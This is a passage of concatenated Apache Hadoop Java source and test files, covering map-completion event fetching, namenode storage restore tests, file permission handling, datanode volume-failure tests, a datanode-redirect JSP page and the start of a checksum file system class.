import org.apache.hadoop.mapred.TaskUmbilicalProtocol;
import org.apache.hadoop.mapred.TaskAttemptID;
//periodically query task tracker to get map completion event.
class EventFetcher<K, V> extends Thread
{
private static final long SLEEP_TIME = 1000;
private static final int MAX_EVENTS_TO_FETCH = 10000;
private static final int MAX_RETRIES = 10;
private static final int RETRY_PERIOD = 5000;
private static final Log LOG = LogFactory.getLog(EventFetcher.class);
private final TaskAttemptID reduce;
private final TaskUmbilicalProtocol umbilical;
private final ShuffleScheduler<K, V> scheduler;
private final JvmContext jvmContext;
private int fromEventId = 0;
private ExceptionReporter exceptionReporter = null;
private int maxMapRuntime = 0;
private final int shufflePort;
public EventFetcher(TaskAttemptID reduce, TaskUmbilicalProtocol umbilical,
ShuffleScheduler<K, V> scheduler, ExceptionReporter reporter, JvmContext jvmContext,
int shufflePort)
{
setName("EventFetcher for fetching Map Completion Events");
setDaemon(true);
this.reduce = reduce;
this.umbilical = umbilical;
this.scheduler = scheduler;
this.jvmContext = jvmContext;
this.shufflePort = shufflePort;
exceptionReporter = reporter;
}
@Override
public void run()
{
int failures = 0;
LOG.info(reduce + " Thread started: " + getName());
try
{
while (true && !Thread.currentThread().isInterrupted())
{
try
{
int numNewMaps = getMapCompletionEvents();
failures = 0;
if (numNewMaps > 0)
{
LOG.info(reduce + ": " + "Got " + numNewMaps + " new map-outputs");
}
LOG.debug("GetMapEventsThread about to sleep for " + SLEEP_TIME);
if (!Thread.currentThread().isInterrupted())
{
// sleep for a second, it's too long?
Thread.sleep(SLEEP_TIME);
}
}
catch (IOException ie)
{
LOG.info("Exception in getting events", ie);
// check to see whether to abort
if (++failures >= MAX_RETRIES)
{
throw new IOException("too many failures downloading events", ie);
}
// sleep for a bit
if (!Thread.currentThread().isInterrupted())
{
Thread.sleep(RETRY_PERIOD);
}
}
}
}
catch (InterruptedException e)
{
return;
}
catch (Throwable t)
{
exceptionReporter.reportException(t);
return;
}
}
/**
* Queries the {@link TaskTracker} for a set of map-completion events from a
* given event ID.
*
* @throws IOException
*/
private int getMapCompletionEvents() throws IOException
{
int numNewMaps = 0;
MapTaskCompletionEventsUpdate update = umbilical.getMapCompletionEvents(reduce.getJobID(),
fromEventId, MAX_EVENTS_TO_FETCH, reduce, jvmContext);
TaskCompletionEvent events[] = update.getMapTaskCompletionEvents();
LOG.debug("Got " + events.length + " map completion events from " + fromEventId);
// Check if the reset is required.
// Since there is no ordering of the task completion events at the
// reducer, the only option to sync with the new jobtracker is to reset
// the events index
if (update.shouldReset())
{
fromEventId = 0;
scheduler.resetKnownMaps();
}
// Update the last seen event ID
fromEventId += events.length;
// Process the TaskCompletionEvents:
// 1. Save the SUCCEEDED maps in knownOutputs to fetch the outputs.
// 2. Save the OBSOLETE/FAILED/KILLED maps in obsoleteOutputs to stop
// fetching from those maps.
// 3. Remove TIPFAILED maps from neededOutputs since we don't need their
// outputs at all.
for (TaskCompletionEvent event : events)
{
switch (event.getTaskStatus())
{
case SUCCEEDED:
URI u = getBaseURI(event.getTaskTrackerHttp());
scheduler.addKnownMapOutput(u.getHost() + ":" + u.getPort(), u.toString(),
event.getTaskAttemptId());
numNewMaps++;
int duration = event.getTaskRunTime();
if (duration > maxMapRuntime)
{
maxMapRuntime = duration;
scheduler.informMaxMapRunTime(maxMapRuntime);
}
break;
case FAILED:
case KILLED:
case OBSOLETE:
scheduler.obsoleteMapOutput(event.getTaskAttemptId());
LOG.info("Ignoring obsolete output of " + event.getTaskStatus()
+ " map-task: '" + event.getTaskAttemptId() + "'");
break;
case TIPFAILED:
scheduler.tipFailed(event.getTaskAttemptId().getTaskID());
LOG.info("Ignoring output of failed map TIP: '" + event.getTaskAttemptId()
+ "'");
break;
}
}
return numNewMaps;
}
// replace http port with netty shuffle port
private String substitutePort(String url)
{
String result;
int portStart = url.lastIndexOf(":");
result = url.substring(0, portStart + 1) + shufflePort;
return result;
}
private URI getBaseURI(String url)
{
url = substitutePort(url);
StringBuffer baseUrl = new StringBuffer(url);
if (!url.endsWith("/"))
{
baseUrl.append("/");
}
baseUrl.append("mapOutput?job=");
baseUrl.append(reduce.getJobID());
baseUrl.append("&reduce=");
baseUrl.append(reduce.getTaskID().getId());
baseUrl.append("&map=");
URI u = URI.create(baseUrl.toString());
return u;
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/server/namenode/TestStorageRestore.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import static org.junit.Assert.assertTrue;
import java.io.File;
import java.io.IOException;
import java.util.Random;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.apache.hadoop.hdfs.server.common.Storage;
import org.apache.hadoop.hdfs.server.namenode.FSImage.NameNodeFile;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
/**
* Test restoring failed storage directories on checkpoint.
*/
public class TestStorageRestore {
public static final String NAME_NODE_HOST = "localhost:";
public static final String NAME_NODE_HTTP_HOST = "0.0.0.0:";
private Configuration config;
private File hdfsDir=null;
static final long seed = 0xAAAAEEFL;
static final int blockSize = 4096;
static final int fileSize = 8192;
private File path1, path2, path3;
private MiniDFSCluster cluster;
private void writeFile(FileSystem fileSys, Path name, int repl)
throws IOException {
FSDataOutputStream stm = fileSys.create(name, true,
fileSys.getConf().getInt("io.file.buffer.size", 4096),
(short)repl, (long)blockSize);
byte[] buffer = new byte[fileSize];
Random rand = new Random(seed);
rand.nextBytes(buffer);
stm.write(buffer);
stm.close();
}
@Before
public void setUpNameDirs() throws Exception {
config = new Configuration();
String baseDir = System.getProperty("test.build.data", "/tmp");
hdfsDir = new File(baseDir, "dfs");
if (hdfsDir.exists()) {
FileUtil.fullyDelete(hdfsDir);
}
hdfsDir.mkdir();
path1 = new File(hdfsDir, "name1");
path2 = new File(hdfsDir, "name2");
path3 = new File(hdfsDir, "name3");
path1.mkdir();
path2.mkdir();
path3.mkdir();
String nameDir = new String(path1.getPath() + "," + path2.getPath());
config.set("dfs.name.dir", nameDir);
config.set("dfs.name.edits.dir", nameDir + "," + path3.getPath());
config.set("fs.checkpoint.dir",new File(hdfsDir, "secondary").getPath());
FileSystem.setDefaultUri(config, "hdfs://"+NAME_NODE_HOST + "0");
config.set("dfs.secondary.http.address", "0.0.0.0:0");
config.setBoolean("dfs.name.dir.restore", true);
}
@After
public void cleanUpNameDirs() throws Exception {
if (hdfsDir.exists()) {
FileUtil.fullyDelete(hdfsDir);
}
}
/**
* Remove edits and storage directories.
*/
public void invalidateStorage(FSImage fi) throws IOException {
fi.getEditLog().removeEditsAndStorageDir(2); // name3
fi.getEditLog().removeEditsAndStorageDir(1); // name2
}
/**
* Check the lengths of the image and edits files.
*/
public void checkFiles(boolean expectValid) {
final String imgName =
Storage.STORAGE_DIR_CURRENT + "/" + NameNodeFile.IMAGE.getName();
final String editsName =
Storage.STORAGE_DIR_CURRENT + "/" + NameNodeFile.EDITS.getName();
File fsImg1 = new File(path1, imgName);
File fsImg2 = new File(path2, imgName);
File fsImg3 = new File(path3, imgName);
File fsEdits1 = new File(path1, editsName);
File fsEdits2 = new File(path2, editsName);
File fsEdits3 = new File(path3, editsName);
if (expectValid) {
assertTrue(fsImg1.length() == fsImg2.length());
assertTrue(0 == fsImg3.length()); // Shouldn't be created
assertTrue(fsEdits1.length() == fsEdits2.length());
assertTrue(fsEdits1.length() == fsEdits3.length());
} else {
assertTrue(fsEdits1.length() != fsEdits2.length());
assertTrue(fsEdits1.length() != fsEdits3.length());
}
}
/**
* test
* 1. create DFS cluster with 3 storage directories - 2 EDITS_IMAGE, 1 EDITS
* 2. create a cluster and write a file
* 3. corrupt/disable one storage (or two) by removing
* 4. run doCheckpoint - it will fail on removed dirs (which
* will invalidate the storages)
* 5. write another file
* 6. check that edits and fsimage differ
* 7. run doCheckpoint
* 8. verify that all the image and edits files are the same.
*/
@Test
public void testStorageRestore() throws Exception {
int numDatanodes = 2;
cluster = new MiniDFSCluster(0, config, numDatanodes, true,
false, true, null, null, null, null);
cluster.waitActive();
SecondaryNameNode secondary = new SecondaryNameNode(config);
FileSystem fs = cluster.getFileSystem();
Path path = new Path("/", "test");
writeFile(fs, path, 2);
invalidateStorage(cluster.getNameNode().getFSImage());
path = new Path("/", "test1");
writeFile(fs, path, 2);
checkFiles(false);
secondary.doCheckpoint();
checkFiles(true);
secondary.shutdown();
cluster.shutdown();
}
/**
* Test to simulate interleaved checkpointing by 2 2NNs after a storage
* directory has been taken offline. The first will cause the directory to
* come back online, but it won't have any valid contents. The second 2NN will
* then try to perform a checkpoint. The NN should not serve up the image or
* edits from the restored (empty) dir.
*/
@Test
public void testCheckpointWithRestoredDirectory() throws IOException {
SecondaryNameNode secondary = null;
try {
cluster = new MiniDFSCluster(0, config, 1, true, false, true,
null, null, null, null);
cluster.waitActive();
secondary = new SecondaryNameNode(config);
FSImage fsImage = cluster.getNameNode().getFSImage();
FileSystem fs = cluster.getFileSystem();
Path path1 = new Path("/", "test");
writeFile(fs, path1, 2);
// Take name3 offline
fsImage.getEditLog().removeEditsAndStorageDir(2);
// Simulate a 2NN beginning a checkpoint, but not finishing. This will
// cause name3 to be restored.
cluster.getNameNode().rollEditLog();
// Now another 2NN comes along to do a full checkpoint.
secondary.doCheckpoint();
// The created file should still exist in the in-memory FS state after the
// checkpoint.
assertTrue("File missing after checkpoint", fs.exists(path1));
secondary.shutdown();
// Restart the NN so it reloads the edits from on-disk.
cluster.restartNameNode();
// The created file should still exist after the restart.
assertTrue("path should still exist after restart", fs.exists(path1));
} finally {
if (cluster != null) {
cluster.shutdown();
}
if (secondary != null) {
secondary.shutdown();
}
}
}
}
<|start_filename|>src/core/org/apache/hadoop/fs/permission/FsPermission.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.fs.permission;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.io.Writable;
import org.apache.hadoop.io.WritableFactories;
import org.apache.hadoop.io.WritableFactory;
/**
* A class for file/directory permissions.
*/
public class FsPermission implements Writable {
private static final Log LOG = LogFactory.getLog(FsPermission.class);
static final WritableFactory FACTORY = new WritableFactory() {
public Writable newInstance() { return new FsPermission(); }
};
static { // register a ctor
WritableFactories.setFactory(FsPermission.class, FACTORY);
WritableFactories.setFactory(ImmutableFsPermission.class, FACTORY);
}
/** Create an immutable {@link FsPermission} object. */
public static FsPermission createImmutable(short permission) {
return new ImmutableFsPermission(permission);
}
//POSIX permission style
private FsAction useraction = null;
private FsAction groupaction = null;
private FsAction otheraction = null;
private boolean stickyBit = false;
private FsPermission() {}
/**
* Construct by the given {@link FsAction}.
* @param u user action
* @param g group action
* @param o other action
*/
public FsPermission(FsAction u, FsAction g, FsAction o) {
this(u, g, o, false);
}
public FsPermission(FsAction u, FsAction g, FsAction o, boolean sb) {
set(u, g, o, sb);
}
/**
* Construct by the given mode.
* @param mode
* @see #toShort()
*/
public FsPermission(short mode) { fromShort(mode); }
/**
* Copy constructor
*
* @param other other permission
*/
public FsPermission(FsPermission other) {
this.useraction = other.useraction;
this.groupaction = other.groupaction;
this.otheraction = other.otheraction;
}
/**
* Construct by given mode, either in octal or symbolic format.
* @param mode mode as a string, either in octal or symbolic format
* @throws IllegalArgumentException if <code>mode</code> is invalid
*/
public FsPermission(String mode) {
this(new UmaskParser(mode).getUMask());
}
/** Return user {@link FsAction}. */
public FsAction getUserAction() {return useraction;}
/** Return group {@link FsAction}. */
public FsAction getGroupAction() {return groupaction;}
/** Return other {@link FsAction}. */
public FsAction getOtherAction() {return otheraction;}
private void set(FsAction u, FsAction g, FsAction o, boolean sb) {
useraction = u;
groupaction = g;
otheraction = o;
stickyBit = sb;
}
public void fromShort(short n) {
FsAction[] v = FsAction.values();
set(v[(n >>> 6) & 7], v[(n >>> 3) & 7], v[n & 7], (((n >>> 9) & 1) == 1) );
}
/** {@inheritDoc} */
public void write(DataOutput out) throws IOException {
out.writeShort(toShort());
}
/** {@inheritDoc} */
public void readFields(DataInput in) throws IOException {
fromShort(in.readShort());
}
/**
* Create and initialize a {@link FsPermission} from {@link DataInput}.
*/
public static FsPermission read(DataInput in) throws IOException {
FsPermission p = new FsPermission();
p.readFields(in);
return p;
}
/**
* Encode the object to a short.
*/
public short toShort() {
int s = (stickyBit ? 1 << 9 : 0) |
(useraction.ordinal() << 6) |
(groupaction.ordinal() << 3) |
otheraction.ordinal();
return (short)s;
}
/** {@inheritDoc} */
public boolean equals(Object obj) {
if (obj instanceof FsPermission) {
FsPermission that = (FsPermission)obj;
return this.useraction == that.useraction
&& this.groupaction == that.groupaction
&& this.otheraction == that.otheraction
&& this.stickyBit == that.stickyBit;
}
return false;
}
/** {@inheritDoc} */
public int hashCode() {return toShort();}
/** {@inheritDoc} */
public String toString() {
String str = useraction.SYMBOL + groupaction.SYMBOL + otheraction.SYMBOL;
if(stickyBit) {
StringBuilder str2 = new StringBuilder(str);
str2.replace(str2.length() - 1, str2.length(),
otheraction.implies(FsAction.EXECUTE) ? "t" : "T");
str = str2.toString();
}
return str;
}
/** Apply a umask to this permission and return a new one */
public FsPermission applyUMask(FsPermission umask) {
return new FsPermission(useraction.and(umask.useraction.not()),
groupaction.and(umask.groupaction.not()),
otheraction.and(umask.otheraction.not()));
}
/** umask property label */
public static final String DEPRECATED_UMASK_LABEL = "dfs.umask";
public static final String UMASK_LABEL = "dfs.umaskmode";
public static final int DEFAULT_UMASK = 0022;
/**
* Get the user file creation mask (umask)
*
* {@code UMASK_LABEL} config param has umask value that is either symbolic
* or octal.
*
* Symbolic umask is applied relative to file mode creation mask;
* the permission op characters '+' clears the corresponding bit in the mask,
* '-' sets bits in the mask.
*
* Octal umask, the specified bits are set in the file mode creation mask.
*
* {@code DEPRECATED_UMASK_LABEL} config param has umask value set to decimal.
*/
public static FsPermission getUMask(Configuration conf) {
int umask = DEFAULT_UMASK;
// To ensure backward compatibility first use the deprecated key.
// If the deprecated key is not present then check for the new key
if(conf != null) {
int oldStyleValue = conf.getInt(DEPRECATED_UMASK_LABEL, Integer.MIN_VALUE);
if(oldStyleValue != Integer.MIN_VALUE) { // Property was set with old key
LOG.warn(DEPRECATED_UMASK_LABEL + " configuration key is deprecated. " +
"Convert to " + UMASK_LABEL + ", using octal or symbolic umask " +
"specifications.");
umask = oldStyleValue;
} else {
String confUmask = conf.get(UMASK_LABEL);
if(confUmask != null) { // UMASK_LABEL is set
return new FsPermission(confUmask);
}
}
}
return new FsPermission((short)umask);
}
public boolean getStickyBit() {
return stickyBit;
}
/** Set the user file creation mask (umask) */
public static void setUMask(Configuration conf, FsPermission umask) {
conf.set(UMASK_LABEL, String.format("%1$03o", umask.toShort()));
}
/** Get the default permission. */
public static FsPermission getDefault() {
return new FsPermission((short)00777);
}
/**
* Create a FsPermission from a Unix symbolic permission string
* @param unixSymbolicPermission e.g. "-rw-rw-rw-"
*/
public static FsPermission valueOf(String unixSymbolicPermission) {
if (unixSymbolicPermission == null) {
return null;
}
else if (unixSymbolicPermission.length() != 10) {
throw new IllegalArgumentException("length != 10(unixSymbolicPermission="
+ unixSymbolicPermission + ")");
}
int n = 0;
for(int i = 1; i < unixSymbolicPermission.length(); i++) {
n = n << 1;
char c = unixSymbolicPermission.charAt(i);
n += (c == '-' || c == 'T' || c == 'S') ? 0: 1;
}
// Add sticky bit value if set
if(unixSymbolicPermission.charAt(9) == 't' ||
unixSymbolicPermission.charAt(9) == 'T')
n += 01000;
return new FsPermission((short)n);
}
private static class ImmutableFsPermission extends FsPermission {
public ImmutableFsPermission(short permission) {
super(permission);
}
public FsPermission applyUMask(FsPermission umask) {
throw new UnsupportedOperationException();
}
public void readFields(DataInput in) throws IOException {
throw new UnsupportedOperationException();
}
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/server/datanode/TestDataNodeVolumeFailureToleration.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.datanode;
import java.io.File;
import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hdfs.DFSTestUtil;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.apache.hadoop.hdfs.server.namenode.FSNamesystem;
import org.apache.hadoop.hdfs.DFSConfigKeys;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.commons.logging.impl.Log4JLogger;
import org.apache.log4j.Level;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import static org.junit.Assert.*;
import static org.junit.Assume.assumeTrue;
/**
* Test the ability of a DN to tolerate volume failures.
*/
public class TestDataNodeVolumeFailureToleration {
private static final Log LOG = LogFactory.getLog(TestDataNodeVolumeFailureToleration.class);
{
((Log4JLogger)TestDataNodeVolumeFailureToleration.LOG).getLogger().setLevel(Level.ALL);
}
private FileSystem fs;
private MiniDFSCluster cluster;
private Configuration conf;
private String dataDir;
// Sleep at least 3 seconds (a 1s heartbeat plus padding) to allow
// for heartbeats to propagate from the datanodes to the namenode.
final int WAIT_FOR_HEARTBEATS = 3000;
// Wait at least (2 * re-check + 10 * heartbeat) seconds for
// a datanode to be considered dead by the namenode.
final int WAIT_FOR_DEATH = 15000;
@Before
public void setUp() throws Exception {
conf = new Configuration();
conf.setLong("dfs.block.size", 512L);
/*
* Lower the DN heartbeat, DF rate, and recheck interval to one second
* so state about failures and datanode death propagates faster.
*/
conf.setInt(DFSConfigKeys.DFS_HEARTBEAT_INTERVAL_KEY, 1);
conf.setInt(DFSConfigKeys.DFS_DF_INTERVAL_KEY, 1000);
conf.setInt("heartbeat.recheck.interval", 1000);
// Allow a single volume failure (there are two volumes)
conf.setInt("dfs.datanode.failed.volumes.tolerated", 1);
cluster = new MiniDFSCluster(conf, 1, true, null);
cluster.waitActive();
fs = cluster.getFileSystem();
dataDir = cluster.getDataDirectory();
}
@After
public void tearDown() throws Exception {
for (int i = 0; i < 3; i++) {
new File(dataDir, "data"+(2*i+1)).setExecutable(true);
new File(dataDir, "data"+(2*i+2)).setExecutable(true);
}
cluster.shutdown();
}
/**
* Test the DFS_DATANODE_FAILED_VOLUMES_TOLERATED_KEY configuration
* option, ie the DN shuts itself down when the number of failures
* experienced drops below the tolerated amount.
*/
@Test
public void testConfigureMinValidVolumes() throws Exception {
assumeTrue(!System.getProperty("os.name").startsWith("Windows"));
// Bring up two additional datanodes that need both of their volumes
// functioning in order to stay up.
conf.setInt("dfs.datanode.failed.volumes.tolerated", 0);
cluster.startDataNodes(conf, 2, true, null, null);
cluster.waitActive();
FSNamesystem ns = cluster.getNameNode().getNamesystem();
long origCapacity = DFSTestUtil.getLiveDatanodeCapacity(ns);
long dnCapacity = DFSTestUtil.getDatanodeCapacity(ns, 0);
// Fail a volume on the 2nd DN
File dn2Vol1 = new File(dataDir, "data"+(2*1+1));
assertTrue("Couldn't chmod local vol", dn2Vol1.setExecutable(false));
// Should only get two replicas (the first DN and the 3rd)
Path file1 = new Path("/test1");
DFSTestUtil.createFile(fs, file1, 1024, (short)3, 1L);
DFSTestUtil.waitReplication(fs, file1, (short)2);
// Check that this single failure caused a DN to die.
DFSTestUtil.waitForDatanodeStatus(ns, 2, 1, 0,
origCapacity - (1*dnCapacity), WAIT_FOR_HEARTBEATS);
// If we restore the volume we should still only be able to get
// two replicas since the DN is still considered dead.
assertTrue("Couldn't chmod local vol", dn2Vol1.setExecutable(true));
Path file2 = new Path("/test2");
DFSTestUtil.createFile(fs, file2, 1024, (short)3, 1L);
DFSTestUtil.waitReplication(fs, file2, (short)2);
}
/**
* Restart the datanodes in the cluster with a new volume tolerated value.
* @param volTolerated
* @param manageDfsDirs
* @throws IOException
*/
private void restartDatanodes(int volTolerated, boolean manageDfsDirs)
throws IOException {
cluster.shutdownDataNodes();
conf.setInt("dfs.datanode.failed.volumes.tolerated", volTolerated);
cluster.startDataNodes(conf, 1, manageDfsDirs, null, null);
cluster.waitActive();
}
/**
* Test for different combination of volume configs and volumes
* tolerated values.
*/
@Test
public void testInvalidFailedVolumesConfig() throws Exception {
assumeTrue(!System.getProperty("os.name").startsWith("Windows"));
// Check if DN exits for an invalid conf value.
testVolumeConfig(-1, 0, false, true);
testVolumeConfig(100, 0, false, true);
// Test for one failed volume
testVolumeConfig(0, 1, false, false);
// Test for one failed volume with 1 tolerable volume
testVolumeConfig(1, 1, true, false);
// Test all good volumes
testVolumeConfig(0, 0, true, false);
// Test all failed volumes
testVolumeConfig(0, 2, false, false);
}
/**
* Tests for a given volumes to be tolerated and volumes failed.
*/
private void testVolumeConfig(int volumesTolerated, int volumesFailed,
boolean expectDnUp, boolean manageDfsDirs)
throws IOException, InterruptedException {
File dir0 = new File(dataDir, "data1");
File dir1 = new File(dataDir, "data2");
// Fail the current directory since invalid storage directory perms
// get fixed up automatically on datanode startup.
File[] currDirs = { new File(dir0, "/current"),
new File(dir1, "/current") };
try {
for (int i = 0; i < volumesFailed; i++) {
prepareDirToFail(currDirs[i]);
}
try {
restartDatanodes(volumesTolerated, manageDfsDirs);
assertEquals(expectDnUp, cluster.getDataNodes().get(0).isDatanodeUp());
} catch (IOException ioe) {
assertFalse("Expected successful restart but got " + ioe, expectDnUp);
}
} finally {
for (File dir : currDirs) {
FileUtil.chmod(dir.toString(), "755");
}
}
}
/**
* Prepare directories for a failure, set dir permission to 000
* @param dir
* @throws IOException
* @throws InterruptedException
*/
private void prepareDirToFail(File dir) throws IOException,
InterruptedException {
dir.mkdirs();
assertEquals("Couldn't chmod local vol", 0,
FileUtil.chmod(dir.toString(), "000"));
}
/**
* Test that a volume that is considered failed on startup is seen as
* a failed volume by the NN.
*/
@Test
public void testFailedVolumeOnStartupIsCounted() throws Exception {
assumeTrue(!System.getProperty("os.name").startsWith("Windows"));
FSNamesystem ns = cluster.getNameNode().getNamesystem();
long origCapacity = DFSTestUtil.getLiveDatanodeCapacity(ns);
File dir = new File(dataDir, "data1/current");
try {
prepareDirToFail(dir);
restartDatanodes(1, false);
// The cluster is up..
assertTrue(cluster.getDataNodes().get(0).isDatanodeUp());
// but there has been a single volume failure
DFSTestUtil.waitForDatanodeStatus(ns, 1, 0, 1,
origCapacity / 2, WAIT_FOR_HEARTBEATS);
} finally {
FileUtil.chmod(dir.toString(), "755");
}
}
}
<|start_filename|>src/webapps/hdfs/nn_browsedfscontent.jsp<|end_filename|>
<%@ page
contentType="text/html; charset=UTF-8"
import="java.io.*"
import="java.security.PrivilegedExceptionAction"
import="java.util.*"
import="javax.servlet.*"
import="javax.servlet.http.*"
import="org.apache.hadoop.conf.Configuration"
import="org.apache.hadoop.hdfs.*"
import="org.apache.hadoop.hdfs.server.namenode.*"
import="org.apache.hadoop.hdfs.server.datanode.*"
import="org.apache.hadoop.hdfs.protocol.*"
import="org.apache.hadoop.hdfs.security.token.delegation.*"
import="org.apache.hadoop.io.Text"
import="org.apache.hadoop.security.UserGroupInformation"
import="org.apache.hadoop.security.token.Token"
import="org.apache.hadoop.util.*"
import="java.text.DateFormat"
import="java.net.InetAddress"
import="java.net.URLEncoder"
%>
<%!
static String getDelegationToken(final NameNode nn,
HttpServletRequest request, Configuration conf)
throws IOException, InterruptedException {
final UserGroupInformation ugi = JspHelper.getUGI(request, conf);
Token<DelegationTokenIdentifier> token =
ugi.doAs(
new PrivilegedExceptionAction<Token<DelegationTokenIdentifier>>()
{
public Token<DelegationTokenIdentifier> run() throws IOException {
return nn.getDelegationToken(new Text(ugi.getUserName()));
}
});
return token.encodeToUrlString();
}
public void redirectToRandomDataNode(
NameNode nn,
HttpServletRequest request,
HttpServletResponse resp,
Configuration conf
) throws IOException, InterruptedException {
String tokenString = null;
if (UserGroupInformation.isSecurityEnabled()) {
tokenString = getDelegationToken(nn, request, conf);
}
FSNamesystem fsn = nn.getNamesystem();
String datanode = fsn.randomDataNode();
String redirectLocation;
String nodeToRedirect;
int redirectPort;
if (datanode != null) {
redirectPort = Integer.parseInt(datanode.substring(datanode.indexOf(':')
+ 1));
nodeToRedirect = datanode.substring(0, datanode.indexOf(':'));
}
else {
nodeToRedirect = nn.getHttpAddress().getHostName();
redirectPort = nn.getHttpAddress().getPort();
}
String fqdn = InetAddress.getByName(nodeToRedirect).getCanonicalHostName();
redirectLocation = "http://" + fqdn + ":" + redirectPort +
"/browseDirectory.jsp?namenodeInfoPort=" +
nn.getHttpAddress().getPort() +
"&dir=/" +
(tokenString == null ? "" :
JspHelper.getDelegationTokenUrlParam(tokenString));
resp.sendRedirect(redirectLocation);
}
%>
<html>
<title></title>
<body>
<%
NameNode nn = (NameNode)application.getAttribute("name.node");
Configuration conf = (Configuration) application.getAttribute(JspHelper.CURRENT_CONF);
redirectToRandomDataNode(nn, request, response, conf);
%>
<hr>
<h2>Local logs</h2>
<a href="/logs/">Log</a> directory
<%
out.println(ServletUtil.htmlFooter());
%>
<|start_filename|>src/core/org/apache/hadoop/fs/ChecksumFileSystem.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.fs;
import java.io.*;
import java.util.Arrays;
import java.util.zip.CRC32;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.util.Progressable;
import org.apache.hadoop.util.PureJavaCrc32;
import org.apache.hadoop.util.StringUtils;
/****************************************************************
* Abstract Checksumed FileSystem.
* It provide a basice implementation of a Checksumed FileSystem,
* which creates a checksum file for each raw file.
* It generates & verifies checksums at the client side.
*
*****************************************************************/
public abstract class ChecksumFileSystem extends FilterFileSystem {
private static final byte[] CHECKSUM_VERSION = new byte[] {'c', 'r', 'c', 0};
private int bytesPerChecksum = 512;
private boolean verifyChecksum = true;
public static double getApproxChkSumLength(long size) {
return ChecksumFSOutputSummer.CHKSUM_AS_FRACTION * size;
}
public ChecksumFileSystem(FileSystem fs) {
super(fs);
}
public void setConf(Configuration conf) {
super.setConf(conf);
if (conf != null) {
bytesPerChecksum = conf.getInt("io.bytes.per.checksum", 512);
}
}
/**
* Set whether to verify checksum.
*/
public void setVerifyChecksum(boolean verifyChecksum) {
this.verifyChecksum = verifyChecksum;
}
/** get the raw file system */
public FileSystem getRawFileSystem() {
return fs;
}
/** Return the name of the checksum file associated with a file.*/
public Path getChecksumFile(Path file) {
return new Path(file.getParent(), "." + file.getName() + ".crc");
}
/** Return true iff file is a checksum file name.*/
public static boolean isChecksumFile(Path file) {
String name = file.getName();
return name.startsWith(".") && name.endsWith(".crc");
}
/** Return the length of the checksum file given the size of the
* actual file.
**/
public long getChecksumFileLength(Path file, long fileSize) {
return getChecksumLength(fileSize, getBytesPerSum());
}
/** Return the bytes Per Checksum */
public int getBytesPerSum() {
return bytesPerChecksum;
}
private int getSumBufferSize(int bytesPerSum, int bufferSize) {
int defaultBufferSize = getConf().getInt("io.file.buffer.size", 4096);
int proportionalBufferSize = bufferSize / bytesPerSum;
return Math.max(bytesPerSum,
Math.max(proportionalBufferSize, defaultBufferSize));
}
/*******************************************************
* For open()'s FSInputStream
* It verifies that data matches checksums.
*******************************************************/
private static class ChecksumFSInputChecker extends FSInputChecker {
public static final Log LOG
= LogFactory.getLog(FSInputChecker.class);
private ChecksumFileSystem fs;
private FSDataInputStream datas;
private FSDataInputStream sums;
private static final int HEADER_LENGTH = 8;
private int bytesPerSum = 1;
private long fileLen = -1L;
